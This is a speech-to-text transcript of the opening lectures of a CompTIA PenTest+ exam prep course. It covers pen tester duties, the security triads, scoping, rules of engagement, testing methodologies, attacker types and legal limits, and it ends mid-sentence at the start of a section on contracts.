CompTIA PenTest Full Course - FREE [11 Hours] PT0-002

[Music] thank you hello welcome to this training course which is a prepping course for the CompTIA pen Test Plus exam this is probably a an exam that is very different from other exams that you may have taken so the idea the goal of this initial video here this first video is to present to you how this exam is structured and also the topics that will be covered and which you have to prepare for now as I mentioned this is a course that is probably different from I'm sorry an exam that is probably different from other

exams that you've taken now the the reason for that is because this exam is the goal of this exam is to test whether you were prepared for real world situations or not so the idea here is to measure whether you are capable of actually performing a pen test in a real world situation so it is different because there are many many tests or exams that will measure whether you know a few tools or some commands or some concepts for example involving a protocol so very conceptual based very theoretical whereas there there are other exams that

they put you in a lab and ask you to perform a few tasks and it doesn't matter how you perform those tasks as long as you achieve the ultimate goal as long as you for example solve that problem the CompTIA pentask exam is a bit different from that so you do need to know a bunch of Concepts but those concepts are supposed to be applied to a real world situation following some standards and this is the most challenge the major challenge that you have in the Conte pen Test Plus exam because you have to not

only be pre technically prepared but you also have to know a bunch of acronyms a bunch of regulations and usually they're based on the American the United States regulations so all these steps that you have to follow they go along with a well-structured and strict sequence of steps so the idea of this course is to get you prepared to follow those strict steps and also get to know the tools and protocols standards patterns that you have to know in order to pass the exam so let's go through very briefly the major topics and each of

these major topics can be broken down in odds many other subtopics the first one is planning and scope which covers about 15 of the exam so this is more and we're going to as we go along the course we're going to discuss each of these topics so the first one planning and scoping which in summary is being able to Define what you are going to do and what you're not going to do then you have information gathering and vulnerability identification which represents 22 percent of the the DXM this is a step where you're going to

collect information about the the the the your target then you have a text and exploits it represents thirty percent of the exam this is where you actually deploy the the attacks you also have 70 percent 17 percent of the exam associated with penetration testing tools so you have to know a bunch of tools and finally you have reporting and communication so the pen tester and we're going to talk about this the pen tester is supposed to not only discover if there are vulnerabilities for example but also generate a report and communicate with the employer or

the client about those issues and how to solve those issues that represents 16 of the exam now you have to keep in mind that the CompTIA pentas plus exam requires you to know or at least understand what a bunch of tools do you don't have to know how to use those tools in depth but you have to know what they do and it covers more than 50 different tools and all these tools are listed in the in the CompTIA website so as you can see it is a very well structured and strict exam you have

to follow their pattern otherwise you won't be able to pass what I mean by that is just to give an example let's say that you know how to use burp Suite but then so that's not the case but let's say that the exam doesn't cover burp Suite if one it requires you to know a different tool to analyze HD HTTP protocol or to change to perform a bunch of attacks that you can do using burp Suite well if you know burp street but you download the tool that the uh the the CompTIA wants you to

know well you're not going to score so it's not only a matter of knowing how to solve a problem but you have to know how to solve a problem following what they expect you to do performing the tasks that they expect you to do which includes knowing the tools that they expect you to know with that being said that means that you have to practice practice to make this exam even more difficult it's not an exam as I previously previously mentioned is not exam an exam where you'll be put in a lab and you have

to solve a problem no you're going to perform some simulated steps so at some moments the exam will show you a situation that is simulating a real world scenario if you don't know how to solve according to that specific strict environment you won't be able to answer that question foreign just to give you another example you have to know did a tool called nmap but not only know how to use nmap but you have to know a bunch of switches that you have or options that you have available when using nmap so you have to

know those specific options now breaking those major topics into other subtopics the contia pen Test Plus exam can be represented by these subtopics the first one is reconnaissance that is where you're going to make a recognition of the environment of the target environment then you have enumeration where you try to Define the get some more specific information about that environment such as the operating systems that are running the specific firmware versions and software versions that are running then you have the vulnerability scanning step credential attacks where you're going to perform a text in order to

break the to find out the combination of user and password then you're going to move to persistence configuration compliance evasion where the goal is to evade without getting noticed or getting passed without getting noticed then you have decompilate then you have forensics debugging so keep in mind once again that these we're going to go through each of these topics here throughout the course so there is no need to discuss in depth these subtopics at the moment and finally software assurance so keep in mind that you have to practice practice practice in order to be able

to take the CompTIA pentas Bliss exam and all this training all these Labs that we're going to perform try to do them as many times as you possible obviously changing that environment a little bit and do it again and again and again this is the the way that you have the pattern that you have to follow in order to get ready for this exam because of the let's say awkward or maybe odd type of environment that is that will be presented to you thank you very much hello Welcome to our introduction to pen testing they

go in this video today is to show you what are the duties and requirements for a pen tester we have to understand what a pen tester do what pen testing is about and also understand that the CompTIA pen Test Plus exam is structured based on regulations on standards and we have to follow those standards as pen testers that is a requirement without understanding that you won't be able to pass the CompTIA pen Test Plus exam so initially before we actually discuss pen testing we have to understand the difference between a cyber security Defender and a

cyber security attacker or a let's say security specialist and in general a hacker so first of all if you studied cyber security or information security more specifically you know that information security is based on a Triad called the CIA Triad CIA stands for confidentiality integrity and availability just to remember the idea of having this Triad is to remind you that the information security depends on guaranteeing confidentiality which means that in from the information is supposed to be confidential only the parts that are supposed to get access to a specific information should have access to that

specific information not other parties whereas integrity means that the information should be should remain unaltered the information cannot be changed unless it's the desire of the interested parties to change that information other parties third parties cannot change that information or data and also we have availability which means that information should be available when necessary well it doesn't help at all if you have a system that that guarantees confidentiality and integrity but the system is not not available the information that is held by that system is not available so that's the CIA Triad on the other

hand hackers are trying to disclosure that information they're also trying to alter information and maybe they're even even trying to cause denial of access to that information so as you can see hackers are trying to implement the dad Triad whereas information security tells you that you have to guarantee the CIA Triad basically what the hackers are trying to do is to overcome those Concepts now a pen tester also called ethical hacker or whiteheader performs penetration tests so basically what they are doing is testing a system a network an entire solution of a client or of

its employer the idea is to use techniques that hackers use in order to check whether that system can be compromised or not whether there are vulnerable vulnerabilities in that system in that solution in that Network in those devices are not so we have to keep in mind that the pen tester is not a hacker itself it's a person that has these skills the skill set that a hacker does it's a person that can think as a hacker in order to find holes find vulnerabilities but the pen tester is not going to explore those issues for

example if the pen tester is capable of getting a hold of information that he or she was not supposed to get he's just going to let the employer or the client know that that vulnerability is there that person is not going to sell that data that information to someone else so as you can see there are boundaries that limit a pen tester so the pen tester makes use of legal resources and techniques to search for vulnerabilities or weakness which means that the company is not only fully aware but there has been a an agreement established

between the parties so the pen tester and a client or a depend tester and the employer actually wrote a contract they came up with an agreement and they have a contract that establishes what is supposed to be done and what cannot be done so the boundaries are established by that contract now it's also very important to know that the CompTIA pen Test Plus exam will require you to know a bunch of acronyms which include acronym acronyms to determine types of contracts so from time to time we're going to talk about SLA we're going to talk

about NDA we're going to talk about sow and so many other types of documents that must be known if you want to take the CompTIA pentast exam obviously there is a reason why they demand that that's because once again this exam requires you to follow some standards mostly defined by nist so there is a contract involved the pen testers are not hackers although they can't think like hackers they have the same skill sets and they must generate reports that is the ultimate goal why because a company is actually hiring the pen tester in order to

know if there are holes and if there are holes if there are vulnerabilities the company wants to fix those holes how can they how can they know what holes of or vulnerabilities are supposed to be fixed if the pen tester doesn't generate a report explaining what was found foreign also keep in mind pen testers are not problem solvers there is a very high probability that you're going to see in your CompTIA pentas plus exam in case of take it you're going to see questions regarding this specific bullet here it's going to say something like these

are tasks to be performed by a pen tester and it's going to say you're going to see a bunch of options there one of those options is going to be solve problems when they are found nope that's not the case and we also have to keep in mind that pen testers are not threat Hunters pen testers are not looking for a specific specific threats threat Hunters are people that are looking for specific threats a specific vulnerabilities because they're getting paid in order to do that for example let's say that um Google is releasing a new

product they want to test their new product obviously they have their internal pen testers but they also want to hire an external company which they will do but they also want to see if other people not from that external company is capable of finding some specific threats so they're going to hire threat Hunters they're going to say okay we want you to see if you can find a threat in this specific module or in this specific software in this specific Solution that's not the case of a pen Tester the pen tester is there in order

to find vulnerabilities try to find vulnerabilities if they exist in an entire solution in an entire structure now why do companies hire pen testers well first of all as everything else to avoid or mitigate Financial loss so there are nowadays a wide range of cyber crimes all flavors different types coming from all places we can enumerate fraud Espionage extortion just to list the field malware dissemination intellectual product property theft unauthorized activity software piracy and so many others in this graph here we can see cyber crime annual revenues this is from 2018 so considering that usually

these statistics analysis are done every two years every other year this is a very recent uh graph so as you can see here this is how much people are making based on cyber crime it's a whole bunch of money so almost a trillion dollars being made out of illegal online online markets um half trillion being made based on trade secret so you can see here that you have probably almost two trillion dollars being made of cyber crime so this is a very lucrative environment or business this is the amount of monetary damage caused by reporter

reported cyber crime to the ic3 from 2001 to 2016. now only in 2016 the monetary damage the monetary laws caused by cyber crime was above a billion dollars that is a lot of money for just one single year so as you can see this keeps increasing growing and growing and growing obviously companies don't want that to keep happening they want to mitigate their loss so that's why one of the reasons why they are hiring pen testers another reason is because the companies want to have a broader view of their is infrastructure so they don't want

to Simply see find if there is an issue in a specific software in a specific device in a specific department but they want to see to have a broader view of their entire infrastructure also they want to fix a specific which can be a single problem or multiple problems but specific ones they also want to implement complementary solutions to their existing Solutions they may also want to remediate problems that they may have and here you must observe that there is a difference between fix and Remediation fix is when you're still using that solution but fixing

the problem when you when you're remediating a problem that means that you may change the solution that you have and most importantly most companies have to now obviously it depends on the country each country have their own regulation or set of regulations but in general most companies I'm sorry most countries have regulations that demand companies to perform pen testing so for example in the United States we have that we have regulations that determine that all companies that take payment by credit card or debit card doesn't matter um they follow their regulations and their standards for

example in the US we have the payment card industry data security standard PCI DSS now for example they demand that companies that do take credit card as payments the companies that do credit card transactions or accept credit card transactions they perform annual external pen tests annual internal pen tests now not precisely in the same order usually what you're going to have is the annual internal pen test and then first and then the annual external pen test but that's not a determination that's not a requirement in case once pen tests are performed and vulnerabilities are found

after those vulnerabilities are fixed those holes are fixed then you have to perform pen test again once again now what are the legal limits as we know laws change from country to Country and even from state to state so it is very very important for pen testers to understand the regulations the laws that that are involved in the environment that person see it's within they're in constant change they must follow up they must follow up they must follow up now keep in mind and we discussed this a few slides ago but keep in mind do

not perform unauthorized access what is unauthorized access if the contract does not specifically say that the pen tester can go further than a specific limit don't if the contract doesn't explicitly say that the pen tester can if the pen tester finds a hole he or she can actually exploit that hole can actually continue moving into that system can continue breaking into that system if the contract doesn't explicitly explicitly mention that then don't unauthorized installation unauthorized attacks in general unauthorized actions now what does it take in order to successfully perform pen tests you have to get

knowledge of the infrastructure we are going to discuss not now but we're going to disc discuss the different types of boxes Black Box white box gray box different types of access that are given to the pen tester by the employer or by the client but it doesn't matter which one it is the pen tester must get knowledge of the infrastructure also must also get knowledge of the human resources and usually this is done by performing social engineering must understand the laws obviously have technical skills which can be enumerated enumerated here first of all understand operating

systems this is an area becoming a pen test requires some very deep high level understanding of operating systems networking and programming also creativity is critical for example not only when using the tools that you have available but also and most importantly when performing social engineering the pen tester must be very very creative in order to extract information from employees that is going to be one of the the tasks that the pen tester will have to perform try to extract information from human resources that belong to that company to that's that specific client now in order

to extract that data or that information creativity is fundamental also social interaction and knowing the tools that you have available now there are a bunch of tools and as I previously mentioned the CompTIA pentas plus exam will require you to know at least know what they do uh they it will require you to know 50 tools approximately 50 different tools now these tools they can be classified in their objective for example we have the part scanners we have sniffers so the part scanners will in summary try to see the services protocols that are actually open

running in that Network or device these sniffers are used to collect data from the network vulnerability scanners that will try to find vulnerabilities the attacking tools that will actually perform attacks it can be vulnerability attacking tool it can be a credential cracking which will try to find the user and password and not a specific tool but a an operating system more specifically a Linux distribution called Kali Linux there are different types of pen testing Linux distributions but Kali Linux is the most not well known it's the major one that probably comes with more resources than

the others now the CompTIA pentas plus stages you have to know how to follow these stages that are the stage stages that the CompTIA pen test exam requires you to understand to follow when performing a pen test they want you to follow these stages one planning and scoping this is the stage where you're going to basically Define the scope of your tests what are the boundaries what do we want to find information gathering and vulnerability identification in this stage the pen tester will try to gather information of that system network devices for example how many

devices are there um how is the network is structured attacking and exploiting this is a step where the pen tester will actually see if he or she can exploit attack the system based on the information that's been gathered in the previous stage and report and communicate those issues now you also have another stage which which is called enumeration you could Define enumeration as a stage between information gathering and attacking although in general enumeration is listed in as a subtopic of information gathering now the report in communication stage is the stage where the pen tester will

have to generate a report showing the client presenting to the client the results found did did I find any vulnerability did I find any just informational problems and also what is supposed to be done so not only mention okay this is what I found but also proposed Solutions keep in mind the pen tester will not execute Solutions but he or she will propose it must be said in that report this is what you can do in order to fix those problems it would not be helpful if the pen tester would only say okay I found

some issues here are the issues now go find the solutions that's not the case the pen tester is also supposed to propose Solutions so we're discussed in this video what is required from a pen tester what a pen tester is and why the company is actually hire pen testers why pen testing is so important also we saw the stages that a pen tester is supposed to perform or follow when executing pen tests keep that information in mind remember the difference between pen tester hacker threat Hunter and also these stages also keep in mind that the

companies are required to perform pen tests by law see you in our next video thank you hello Welcome to our module 2 of our pen Test Plus prep exam course here we're going to discuss some very important uh theories and Concepts that are required in order to pass the continents plus exam these are very important Concepts as previously mentioned as we mentioned in the previous module it's very important for the CompTIA pin Test Plus exam to demand from the ex from the students to prove that person not only knows how to use tools but also

how to prepare and plan for a pen testing also it requires from you some knowledge on legalities on some laws and regulations so that's going to be our focus in this module so this module here will be focused on scoping and planning for engagement and in order to do that we must know some regulations according to the location where you're at and also where your client is at most importantly usually you must know the regulations in your client's location so first of all we have to understand some stuff regarding scoping and planning now what is

this about before a pen tester or a white header starts a pen testing there are some steps that are required as anything else right so when it comes to pen testing you must first prepare for that task or those set of tasks well basically you're Gathering some information trying to develop a plan trying to gather some data before you actually do what you're supposed to do now this involves a bunch of steps and this is a more theoretical step actually because there is not a specific set of steps that must be taken before you actually

execute a pen test there is a broad set of steps that must be taken and you may do follow all those steps you may execute just a few of them so basically it depends on what you're trying to do it depends on the scenario it depends on the reality of your client or your employer so there there is a bunch of variables here that is why in order to prepare for that for that pen test or those pen tests you must scope you must Define a scope so basically scoping is a step where or phase

where you're going to sit down with your client for example and there is a lot of metrics parameters constraints limits that must be established it's very very important to know where you're stepping into you have to know your limitations you have to know your scope what you can and what you cannot do before you can actually plan for that execution for that pen test now talking a little bit more about scoping as I mentioned the goal here is to determine a bunch of metrics for example you have to determine the why why are you going

to perform that pen test and this is a question that must be answered by your client mostly or your employer the employer must know why that pen test is going to happen why is that client actually hiring someone to execute a pen test there is a plural number of reasons that may happen now why is this so important why is the why so important because basically this is going to define the scope of the pen test let's say that the the the client wants to make sure that a new system that just arrived is safe

is secure okay so the scope is very limited it's not the entire network it's not all systems all applications all devices uh that are going to be pen tested it's a specific system so the scope is must be well determined and you can determine that by answering why the depend test is going to happen and then you evolve and now it's important to realize that it doesn't have the the pen tester doesn't have to answer these questions in uh in this sequence it may vary some questions may be answered some questions may not be answered

so you don't have to determine all these questions here um maybe you have to determine more metrics so it's very subjective but what is important to understand here is that determining as many facts as you can is critical so for example you also have to determine what to pen test what are you going to pen test what are you going to test what are you going to try to hack for example just as I previously mentioned just a specific system a set of system the entire infrastructure are you going to try to pen test Human

Resources as well so there is it it must be very precisely determined what to pen test now it's different from what to access and sometimes this may be a kind of confusing because when you ask this question what to access you may think about once again systems networks well that as well but not only that but then we you also have the physical environment what are you going to try to access are you going to try to get physical access to that company maybe it's a large company that has a headquarter and also its branches

will you have access to those branches will you have access to the Head headquarter maybe they won't give you access but they will allow you to try to get access to those locations if you can manage to um use social engineering for example and then get access to those locations also the networks what are the net networks that are you going to access or try to access only their private Network the public network wireless wi-fi network so not only physical but digital as well but again it must be precisely determined one good example here is

let's say that you see that you could get access to a client's network but to do that you have to first access a branch or another ISP and then you can try to get access to the headquarters okay but before you try to get access to one of those branches to then get access to the headquarters are you allowed to get access to this brain just because if the the contract determines and we're going to discuss all those types of contracts and documents that must be signed and specified but let's say that the contract just

say okay the pen tester can try to get access or can get access to our headquarter it doesn't mention the branches well if you do that if you do get access to the branch before getting getting access to the headquarter you may get in trouble so you may get prosecuted it's it's very serious and that is why scoping is such a critical step now you also have to determine and usually this is once again determined by the client or the employer whether it's um a pen test that is being executed to adjust to some regulations

so basically is it compliance pen test or is it business pen test what's the difference in a businessman test that's where the employer or the client wants to know okay for my own safety my company's safety and my clients safety we want to make sure that our systems networks devices are safe are not vulnerable and if they are we just want to fix them now it's more of a ideological thought it's a concern between business and clients now compliance is when the company is actually required to perform that pen test or those pen tests in

order to be compliant with a specific regulation or some set of regulations we we are also going to discuss that uh soon enough but just to give you a heads up let's say that you have a um health insurance company a health insurance company has some critical data about its clients for example Social Security number so there is the the so-called HIPAA which is a set of regulations that Define a bunch of stuff including the type of security that must be guaranteed for for the the um health insurance companies clients so the health health insurance

company must guarantee that for example the its clients Social Security numbers are secure they are not going to uh go public for example so there is a set of regulations that Define determine what has to be done so health insurance companies they might must be compliant with HIPAA for example and also doing the scoping phase we're gonna have the Rules of Engagement now the Rules of Engagement are determined in the scoping phase but they're very important for the planning phase as well now what are the rules of engagement oh and obviously you have to also

determine to whom you're going to report so it doesn't matter whether you're going to just write a final report or partial reports but you have to know to whom you are going to report how many people what did they do you have to specifically know about those people why because for example you want to prevent giving information to someone that says okay I'm this person for example I'm the I'm a director I'm the I.T director I'm the it manager or whatever the person says that he or she is and then you give some private information

that you're not supposed to give so during the scoping phase you must be told by your employer or your client who you must ask this question who are the people that I'm supposed to give information about the pen tests who can I talk to who can I communicate with now before we discuss Rules of Engagement we have to understand there are some Concepts that must be understood as well first of all the major types of assessment the assessment is well what you're going to assess right so for example you have the goals based or objectives

based assessment basically here it means that the pen test will be executed focusing on some well-determined objectives well-determined goals you can also as previously mentioned execute the compliance based assessment so what whether it's based on HIPAA or PCI DSS or anyone well so the assessment could be compliance based now a different one that I haven't mentioned yet is the red team assessment the red team assessment is very interesting and you have to pay attention to this type of assessment here mostly because although it's common it's also you're going to see many many questions in your

CompTIA pen Test Plus exam regarding rare teams it's very common so they really work on this type of assessment and the reason is because the CompTIA pentaspolis exam is focused on real world scenarios and in a realistic scenario this is very common as I mentioned now what is the red team assessment it's basically it's an assessment where the client or the employer will hire a red team it's called a red team to actually perform attacks so the goal of a red team is not to try to find failures not to try to find vulnerabilities and

then write a report to the client saying okay this is what we found this is how you fix it there is a big difference and the difference is when you have a ghost-based or objectives based assessment or compliance based assessment it's critical to at the end of the assessment the pen tester must write a report and in that report the defend tester must not only say okay this is what we found but you must also say this is how you fix it or at least that's how I would fix it I as a pen tester

in a red team assessment that's not the case basically we're hiring a team usually it's a team to try to find vulnerabilities now it's also very common to see red teams when it comes to new softers or new software versions for example um a database let's say that a specific database management system company a company that designs database Management Systems they want to show proof that they are their product is safe so what do they do they go public and say hey this is our new product come in try to find vulnerabilities and if you

do well in this case you get a prize you tell us how you did it you don't actually have to tell us how you how we can fix it but you have to tell us what you did okay and based on that we're gonna fix that problem and you're gonna get some cash basically that's what it is well so that is a type of red team assessment although it's public that's not what is generally done and that is not what the CompTIA pentas plus exam is looking for but it's a very similar idea it's the

idea of hiring a team that will try to find vulnerabilities and let the client know when they do similarly we have what is called The Blue Team the blue team are the security Specialists those are the people that are trying to defend they're they're the ones that are deploying security measures and if the red team finds flaws vulnerabilities the blue team will try to fix those flaws now once the assessment has been defined you also have to determine with your client what kind of methodology is going to be used is it going to be a

white box environment is it going to be gray box environment or a black box environment now what's the difference as you can see here a white box methodology or a white box environment is an environment where the pen tester has access to infrastructure data or infrastructure information for example the client will tell you you as a pen Tester the client will tell you okay this is our public IP or public IPS these are our domain names um our that's our private Network IP these are the systems that we use um this is the number of

devices that we have they can even give you a diagram showing their topology documentation describing what they have they can even give you credentials to access some systems depending on the type of test that they want to be done now this is the the type of environment or at least a pen testing environment where you're going to have um a bunch of information before you actually start pen testing now you have quite the opposite of that methodology that's the black box where you're giving no info at all so they may worst case scenario the company

will simply say okay this is our company that's our name we're not even gonna give you our uh website URL um we're not even going to give you our public IP address you have to figure it out all by yourself okay this is what we do that's our name and that's it then you're gonna have to find everything by yourself so as you can see this is gonna take this is a type of methodology that will take longer because you're gonna need to gather much much more data much much more information and obviously since it's

gonna take longer at least in theory this is the most expensive methodology and you also have the middle ground so you have the gray box methodology where you have a mix of white and black boxes so the client may give you some information and may hide some information from you again scoping this must be determined this must be there must be an agreement between the client and you pentaster now another question that must be answered and we have to have very clear in our mind all this that we've been discussing here that I've been talking

about here is doing the determination phase the scoping phase and the scoping phase must be performed between you as a pen tester and the client nothing here is going to be determined by yourself and yourself only everything here must be a an agreement between you and the client now which leads us to the types of attackers the type of attacker must be determined according to what the client wants to test so let's say that the client wants to Simply say okay what if I want to see if my system is vulnerable to very simple attacking

tools let's say that a kid a 15 years old kid a 13 years old kid just to have fun or just out of curiosity wants to try to attack my system okay so those are the script kitties those are called Script kitties script kitties are usually people that are using some pre-existing tools so it's not a focused attack they're just running those tools and trying those tools against a bunch of ips if it works okay so that's a plus for them but it's not a specific type of attack which means that only very vulnerable systems

may be susceptible to it so the type of information that the company wants to protect from will be associated with the type of attacker right so for example um we've seen lately and this is 2020. we've seen lately that Facebook and Google are losing some advertisement contracts because these big companies are saying okay we're not going to advertise with these two two companies specifically Facebook and Google we're not going to advertise with them anymore because they are not um taking precaution they are not preventing some types of posts that are basically racial racists um Prejudice

posts or political posts these are called uh activists now there are some activists that they have knowledge and they they use they they have I.T knowledge and they use that I.T knowledge to hack systems so those are called hacktivists basically the activists are hackers that they only hack systems to make a let's say political stand we also have the black hats and organized crimes now black hats and organized crime is not the same they're not in in the same bucket but at the end they're looking at the same they have the same goal which is

profit Financial profit right black hats are people that are trying to steal uh information and sell that information make some kind of gain and we have the organized crime that many men many many times may use black hats to execute the crimes that they're that they're willing to to execute and we also have the advanced persistent threats as you can see here we can see the word persistent this type of of attacker will not only gain access to a system or a network or a device but will make sure that he or she will be

able to get back so some kind of for example some kind of Trojan Horse will be installed a back door that will guarantee that person can get back to that Network or maybe that attacker doesn't actually want to get back but wants to install a trojan horse that will keep sending data keep sending information to that attacker so it's going to install a backdoor Trojan Horse whatever it is that will collect data and send to that person so different types of apts but what you have to understand here is that the APT is the most

dangerous one because this is a type of attacker that will guarantee that once the system is compromised it will be it will remain compromised for a long time at least that's the goal maybe that's it's not successful but that's the goal now what is again what is why is it so important to know the types of attackers well because the client must know what type of pen tester that company is going to hire right and obviously it will be associated with the type of attacks that the pen tester will perform well if that attacker I'm

sorry if that pen tester will try to do execute some specific attacks look for some specific vulnerabilities then the client must know what kind of profession professional it's looking for no as previously mentioned Rules of Engagement Rules of Engagement or Roe is also a critical step or phase in scoping and planning why because the Rules of Engagement will determine a bunch of stuff and it must be as broad as possible so for example in the Rules of Engagement which is basically a document uh describing the Rules of Engagement is not the document but did you

have a document which will see the types of documents that we have to know but one of these documents or contracts must determine is explicitly determine the Rules of Engagement which means how this pen test is going to be executed for example how long is it gonna take for how long is it is it going to happen so we need a timeline obviously this timeline may not be as precise as accurate as desired but at least it must be as close to that Perfection as possible also the Rules of Engagement must include what's included must

describe what's included and also what's excluded and you you can see here excluded in red because this is very very very important why is it so important well included what are the devices that the pen tester can try to attack can try to find vulnerabilities what are the systems what are the applications what are the devices what are the networks what are the physical environments the physical locations what are the paths but if the client wants to make sure that the pen tester doesn't doesn't uh do something specific that must be described as well let's

see an example if the client is hiring the pen tester to pen test a new system that the company has just purchased well it must be very clear that the pen tester will not at any moment also try to get access to other systems that pentaster will only try to get access to that system unless the company also wants to see or want to answer the question is it possible to get access to this new system if the attacker get access to another system before reaching to that newly purchased system so this is this must

be very well described if that's the case where the company wants to allow the pen tester to get access to one system before getting access to the final product okay so the Rules of Engagement must determine must must describe okay all of our systems are allowed to be pen tested or let's say that the attacker cannot pen test that other system but they want to give access to the pen tester so it's going to describe that the pen tester will get credentials to that specific system using those specific credentials then the pen tester can jump

into the newly purchased system so there may be a bunch of constraints a bunch of limitations and that must be described in the Rules of Engagement data what to do with Data before during and after pen testing so for example okay before pen testing is the client going to give any data making any data available to the pen tester yes no so that must be asked the pen tester must ask that to the client what about during the pen test what to do during the pen test the data that is going to be transmitted between

the pen tester as an attacker and decline systems networks devices how is it going to be transmitted is the client going to is the pen tester going to just execute those attacks as a uh as a red teamer or is it some kind of gray box where the pen tester will have a VPN connection to that Network and therefore the data that is being transmitted through that VPN must be ciphered for example so during the transmission what can happen and after the the pen test is done once it's done what to do with the data

collected by the pen tester okay so the pen tester Must Destroy that data must deliver a copy of all the data that was acquired now once again there are different situations different possibilities but it must be uh settled between the client and the pen tester but not another rule of Engagement to be established what the active response is going to be from the clients so or from the client let's say that the pen tester tries to get access to a specific system if there is a firewall and that firewall detects that is that that attempt

is happening what is the fire firewall going to do is it going to block it is it going to identify the source and if it comes from the pen Tester the firewall is going to allow that traffic if that traffic is blocked for how long that client in this case the pen tester will be blocked away from the system so the action and reaction must be determined are the resources required to successfully conduct depend are there resources required to successfully conduct the pen test so in case the pen tester needs any kind of resource to

successfully execute the pen test then the client must make those resources available now successfully conduct depend test doesn't mean that the client has to give enough data to the pen tester to make sure that the pen tester can actually uh find vulnerabilities or get access to the system or to the network it's not to guarantee that the the hacking activities will be successful but the tasks of conducting the pen tests foreign the laws and regulations involved must be identified and determined now this is something that usually once again involves the client its response it's the

pentaster's responsibility to know or look into the laws and regulations that are involved so if the client if the pen tester has a client that resides in the US and in a specific State let's say the state of New York so the pen tester must know the regulations involved in those tasks the tasks that are to be performed and testing tasks if that pentaster resides in let's say Australia while then we have a two countries a combination of two countries we may also have international laws so the the pen tester must be aware of that

but also there must be some regulations at least internal regulations by the determined by the company the clients company so that is another situation to look into ask the client what are the regulations that they have what are the limits that they have what are the policies that they have regarding pen testing a company May perfectly determine some policies regarding okay when we run a pen test this is what may happen this is what we allow this is what we don't allow so this must be determined and covered in the Rules of Engagement the pen

tester must know the rules of engagement also another rule of Engagement is frequency of communication how frequent is the pen tester going to communicate with those that he or she is supposed to communicate with so for example if you're if the pen tester is running a pen test that will take only one or two days while most likely the communication will be done just once it's done once it's finished oh well obviously before the tasks are initiated but then after that only at the end that's the most common but if the pen tests are taking

longer let's say a week two weeks a month maybe even semesters or years so the frequency must be determined the frequency of communication every week every two weeks every time a new vulnerability is found so it doesn't matter as long as it's uh it's determined between the pen tester and the employer or a client and once again the contacts which means to whom the pentaster is communicating and from whom it's accepting requests or accepting information we want to make sure that we as pen testers are not communicating with the wrong people this is sensitive data

you must be very very careful so in your county pen Test Plus exam you may see a question that will say Okay so the um IT director just got in touch with you and said hey I want to see um what you have so far on the pen tests that you've been running what are you going to do give that person the information verify if that is actually the the uh the IT director or even if it is the IT director you are going to contact your first Contact the person that actually hired you and

asked whether that person can be uh can get access to the information or you're going to write another contract another statement of work or whatever that is or non-disclosure agreement contract some documents that we're going to discuss soon enough in our next video now once again scoping scoping is severely critical so what if you as a pen tester find data or resource that is not covered by the scope agreement of rules uh or scope agreement or Rules of Engagement so well again these are not documents so it must be very clear that scope agreement or

Rules of Engagement are not documents that's because I use these terms in this question here because we haven't discussed we haven't discussed the documents and document names yet but if uh the pen tester find data or any resource that is not covered by the scope or the Rules of Engagement that's been determined well what could happen so for example if we look at the possibility to get access to an original Target a specific Target from a specific subnet however this subnet is not covered in the agreement or the opposite the possibility to get access from

that Target um to a a specific subnet and again that subnet is not covered so you see a situation where as I previously mentioned this possibility you are focusing on a specific Target but to get access to that Target you see another possible route another possible path and that path is jumping to another sub Network or um differently you do get access to a Target and then from that Target you have the possibility to jump into another sub network but either way if that subnet is not covered in the agreement if this pen tester didn't

discuss with the client whether he or she is allowed to get access to other resources other devices other networks well the the problem is the client can actually Sue you as a pen tester also you as a pen tester make it very very clear that downtime may occur devices that are being that you're attempting trying to hack trying to find vulnerabilities they may fail so for example one tool that we're gonna see is called nessus nessus is a tool that performs passive attacks but also active attacks and there is a very high probability that active

attacks if the the system that you're testing pen testing is vulnerable to a specific active attack that system can crash so it must be very clear it the pen tester must make it clear to the client hey if this is what you want me to do you must know that there is a chance that if there is a vulnerability there that system May crash now what is acceptable what are the systems that can crash if they do for how long can they go down maybe the client says Hey only for 10 minutes okay that's not

possible because if that system crashes it may take more than 10 minutes so all these must be very clear all the possible scenarios must be detailed must be precisely described now for you as a pen tester there is a bunch of resources that are taken for granted that a bunch of pen testers they don't care much specifically because we tend to be very technical very very Hands-On and we want to sit down and start testing start pen testing trying to find vulnerabilities but before we do that we have to observe drag our attentions to some

resources that are very very important and usually are taken for granted first of all documentation so the company may may have some XML based systems for example it's using web services well web services usually are XML based nowadays a bunch of systems rxml based also those systems may use some apis apis usually are documented just like XML files they are documented so that documentation may give you as a pen tester a bunch of information not only flaws such as saying okay these are the uh the input boxes the text Fields the possible values not only

that but just describing how the API Works how describing how the web service work will give you more information and that's what a pen tester need a pen tester needs a lot of information same thing for SDK systems internal systems if there are internal systems probably there's going to be documentation described in those systems the uh the internal employees that design those systems or that system they documented that system for sure or at least they should have the company will certainly have diagrams and configuration files so all those documents are very very useful foreign so

user accounts whether even guest accounts are important networks physical environments all these resources that are accessible or can be accessible is going to be very important so gathering information about all that what are the user accounts that I can find or that I have what can they get access to what are the networks what are the physical environments is there just one single location how can I get into that single location if there is if there are branches how is the headquarter connected to the to those branches and finally budget that's why I mentioned up

here limited resources taken for granted budget is a very very important resource that most of the times is limited and it must be analyzed so the pen tester and the client they must come into an agreement about their budget what can be done not only but also in regards to how many hours at most we're gonna have to spend here but also okay if I find something or if I see the possibility of finding something and we have to purchase a new software we have to purchase a new product a new device or whatever that

is if that this pen test once again uh causes a crash for how long can your system stay down because it's going to generate some loss of Revenue so budget is very very important and this is the most limited resource that is taken for granted most of the times so keep in mind that before actually executing any type of pen test you have to first scope and plan and the CompTIA pen Test Plus exam is very very focused on that because they are focused on real world scenarios realistic scenarios remember that you have to determine

the Rules of Engagement you have to sit down with their client and answer a bunch of questions determine the limits determine what is included what is not included what is going to be given to you and very very important budget I hope you enjoyed this video thank you very much hello welcome to the continuation of our scooping and planning module and another very important matter that we have to be aware of and we have to pay attention to when it comes to planning and scoping is the legalities the laws the regulations that involve pen testing

now it's common to working countries where we don't have specific actually most of the countries don't have specific laws or regulations for pen testing however there are some regulations that apply to pen testing although they are not specific they apply to pen testing and we have to be aware aware of those also the CompTIA pentas plus exam really is really concerned about the contracts or the documentation the documents that involve a pen testing contract a pen testing project and that's what we're going to discuss here in this video so basically our focus is going to

be the legal letter soup actually we're gonna see a bunch of acronyms three letter acronyms most of the times well first of all we have what we know as the contract so the contract as you all know it's just a document where the involved parties are describing what is supposed to be done how it's supposed to be done however and also it may also have a timeline however it's not a very detailed document so that is why we have the so the statement of work s-o-w so the statement of work is very similar to a

